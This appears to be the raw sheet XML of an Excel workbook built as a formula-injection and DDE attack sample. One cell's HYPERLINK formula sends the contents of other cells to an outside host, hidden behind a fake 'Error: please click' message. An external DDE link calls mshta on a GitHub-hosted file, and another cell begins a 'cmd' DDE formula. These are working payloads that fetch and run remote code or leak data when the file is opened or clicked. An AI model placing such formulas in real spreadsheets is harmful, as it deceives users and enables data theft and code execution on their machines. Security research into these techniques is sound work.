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0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9" i="1" l="1"/>
  <c r="D15" i="1" l="1"/>
  <c r="D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shta" ddeTopic="https://github.com/carameal99/myfolder/files/1456424/spec.txt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5"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="D10" sqref="D10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="4" max="4" width="65.28515625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="4" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D4" s="1" t="str">
        <f>HYPERLINK("http://contextis.co.uk?leak="&amp;A1&amp;A2,"Error: please click for further information")</f>
        <v>Error: please click for further information</v>
      </c>
    </row>
    <row r="9" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D9" t="e">
        <f>[1]!A0</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="15" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D15" t="e">
        <f>cmd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2018-02-26T03:20:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-26T05:55:06Z</dcterms:modified>
</cp:coreProperties>
</file>